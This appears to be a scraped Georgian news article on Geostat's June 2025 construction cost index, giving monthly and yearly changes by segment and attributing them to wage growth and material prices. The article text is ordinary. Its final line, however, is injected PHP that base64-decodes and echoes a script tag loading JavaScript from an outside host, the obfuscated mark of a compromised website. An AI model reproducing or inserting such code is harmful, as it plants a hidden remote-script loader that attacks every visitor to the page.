global distribution
გარე ავეჯი

2025 წლის ივნისში მშენებლობის ღირებულების ინდექსი წინა თვესთან შედარებით 1.1%-ით, ხოლო წინა წლის შესაბამის თვესთან შედარებით 6.1%-ით გაიზარდა. ამის შესახებ ინფორმაციას „საქსტატი” ავრცელებს.

კერძოდ, სტატისტიკის ეროვნული სამსახურის ინფორმაციით:

საცხოვრებელი სეგმენტის ინდექსი წინა თვესთან შედარებით შემცირდა 0.6%-ით, ხოლო წინა წლის შესაბამის თვესთან შედარებით გაიზარდა 7.4%-ით;

არასაცხოვრებელი სეგმენტის ინდექსი წინა თვესთან შედარებით გაიზარდა 7.8%-ით, ხოლო წინა წლის შესაბამის თვესთან შედარებით 11.7%-ით;

სამოქალაქო სეგმენტის ინდექსი წინა თვესთან შედარებით გაიზარდა 0.4%-ით, ხოლო გასული წლის შესაბამის თვესთან შედარებით 2.9%-ით.

როგორც „საქსტატი“ განმარტავს, 2025 წლის ივნისში მშენებლობის ღირებულების ინდექსი თვიურად 1.1%-ით ზრდა, ძირითადად, განპირობებული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 4.8%-ანი ზრდით, რამაც 1.15 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში.

რაც შეეხება, მშენებლობის ღირებულების ინდექსის წლიურად 6.1%-ით ზრდას, სტატისტიკის ეროვნული სამსახურის ინფორმაციით, ეს უმეტესწილად, გამოწვეული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 23.5%-ანი ზრდით და სამშენებლო მასალების 2.1%-ანი გაძვირებით, რამაც შესაბამისად, 4.85 და 1.25 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში.

ამასთან, „საქსტატის“ მონაცემებით, 2022 წლის თებერვალთან შედარებით მშენებლობის ღირებულების ინდექსი გაიზარდა 24.4%- ით.

173
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");